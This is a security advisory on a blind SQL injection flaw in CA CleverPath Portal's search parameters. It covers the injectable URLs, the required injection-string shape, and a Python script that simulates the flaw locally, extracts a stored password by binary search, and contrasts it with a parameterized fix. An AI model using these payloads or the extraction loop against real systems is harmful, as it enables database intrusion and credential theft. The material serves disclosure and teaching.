
CA CleverPath SQL Injection

January 8, 2007


Hacktics Research by Irene Abezgauz, January 18th, 2007. CVE: CVE-2007-2230 / BID: 23671

Background

The CA CleverPath Portal is a customizable portal for the aggregation and integration of data and applications. It is integrated into multiple CA products, including various Unicenter components. CleverPath uses a back-end database to store its data and can work with either the built-in database or an external one.

Scope

After observing irregular behavior in CleverPath when modifying query parameters of the search mechanism, Hacktics conducted research to determine whether the construction of the search query is vulnerable to SQL injection.

The Finding

The search mechanism of the CleverPath Portal builds its SQL query from user-supplied search parameters without adequately sanitizing them. By supplying crafted values for these parameters, an attacker can inject SQL syntax and alter the query sent to the back-end database.

Details

The light search URL is (foo.bar:fooport is a placeholder host and PARAM marks the user-controlled value):
https://foo.bar:fooport/servlet/portal/search/execute?CHARSET=UTF-8&showtemplate=false&OFINTEREST=PARAM&showtemplate=false
The advanced search URL is:
https://foo.bar:fooport/servlet/portal/search/execute?CHARSET=UTF-8&showtemplate=false&Search=Search&TITLE=&DESCRIPTION=PARAM&FILENAME=&OWNERNAME=&GROUPNAME=&DATES=NONE&ResultCount=20&CREATE_OPT=0&MODIFIED_OPT=0&MODIFIED_BAFT=&MODIFIED_BAFT_YEAR=&MODIFIED_BAFT_MONTH=&MODIFIED_BAFT_DAY=&MODIFIED_TO_YEAR=&MODIFIED_TO_MONTH=&MODIFIED_TO_DAY=&MODIFIED_FROM_YEAR=&MODIFIED_FROM_MONTH=&MODIFIED_FROM_DAY=

By replacing some of the search parameters, for example OFINTEREST in the light search or DESCRIPTION in the advanced search, it is possible to inject SQL syntax and modify the query sent to the database, and thereby the query results. Conventional injection techniques such as UNION SELECT cannot be used here; the injection is only exploitable as a blind injection via the binary-search vector described by Sverre H. Huseby in his posting "Using Binary Search with SQL Injection": each request asks the database a yes/no question about the data, and the answer is read from whether the search returns any results.

Note: The injection only works if the first character of the input is a single quote ('). The AND operator must appear before the OR operator in the injection string, and the string must contain the OR '1'='1 clause; otherwise no results are returned even when the condition in the AND clause is true.
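The following Python script is an added example, not Hacktics code and not CleverPath's implementation. It simulates the behaviour described above: a search handler that concatenates the DESCRIPTION parameter into a LIKE clause, an injection string in exactly the shape the note requires (leading single quote, AND before OR, trailing OR '1'='1), and the binary-search extraction driven only by whether the search returned rows. The parameterized search beside it shows the fix. The table and column names, the sample rows, the secret value and the query text are constructed assumptions; the advisory does not disclose CleverPath's real query, and the simulated one is merely built so that the three constraints in the note hold.

```python
import sqlite3

# Constructed schema and data for this example; the advisory discloses neither
# CleverPath's tables nor its query text. The 'users' row is the secret we extract.
SAMPLE_SCHEMA = """
CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT, description TEXT);
INSERT INTO documents VALUES (1, 'Quarterly report', 'Finance figures for Q4');
INSERT INTO documents VALUES (2, 'Portal manual', 'How to configure the portal');
CREATE TABLE users (name TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cr3t');
"""

# Scalar subquery used inside every injected condition (assumed table/column names).
SECRET_EXPR = "(SELECT password FROM users WHERE name = 'admin')"


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def vulnerable_search(conn: sqlite3.Connection, description: str) -> list:
    """Simulated vulnerable handler: the DESCRIPTION parameter is concatenated
    into a LIKE pattern. A broken query yields an empty result, which is what
    the advisory reports for malformed injection strings."""
    sql = ("SELECT title FROM documents WHERE description LIKE '%"
           + description + "%'")
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return []


def safe_search(conn: sqlite3.Connection, description: str) -> list:
    """Hardened form: the value is bound as a parameter, so quotes in it are data."""
    sql = "SELECT title FROM documents WHERE description LIKE '%' || ? || '%'"
    return conn.execute(sql, (description,)).fetchall()


def payload(condition: str) -> str:
    """Injection string in the shape the advisory requires: it opens with a single
    quote, the AND comes before the OR, and it ends with OR '1'='1. The trailing
    %' appended by the handler attaches to the final literal ('1%'), so the query
    stays syntactically valid and the OR branch is always false; rows come back
    only when the injected condition holds."""
    return "' AND (" + condition + ") OR '1'='1"


class BlindOracle:
    """Yes/no oracle: does the search return any rows for this condition?"""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.queries = 0

    def ask(self, condition: str) -> bool:
        self.queries += 1
        return len(vulnerable_search(self.conn, payload(condition))) > 0


def extract_char(oracle: BlindOracle, position: int) -> str:
    """Binary search over printable ASCII (32..126) for one character of the secret."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"unicode(substr({SECRET_EXPR}, {position}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_secret(oracle: BlindOracle, max_len: int = 64) -> str:
    """Recover the whole secret, stopping once the position exceeds its length."""
    chars = []
    for pos in range(1, max_len + 1):
        if not oracle.ask(f"length({SECRET_EXPR}) >= {pos}"):
            break
        chars.append(extract_char(oracle, pos))
    return "".join(chars)


if __name__ == "__main__":
    db = setup_db()
    probe = BlindOracle(db)
    print("no OR tail, query breaks:", vulnerable_search(db, "' AND (1=1)"))
    print("extracted:", extract_secret(probe), "using", probe.queries, "queries")
```

Each character costs seven yes/no requests (log2 of the 95 printable ASCII values, rounded up), plus one request per position to detect the end of the string; the same loop works against any scalar the injected subquery can reach. Dropping the OR '1'='1 tail leaves the handler's trailing %' dangling and the query fails, which reproduces the "no results even when the AND condition is true" behaviour from the note.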

Affected Systems

Multiple CA products and 3rd party products utilizing the CleverPath Portal

Solution

CA was notified of this vulnerability on January 18th, 2007, and has released a patch correcting the problem.

Copyright Hacktics 2009. All rights reserved.
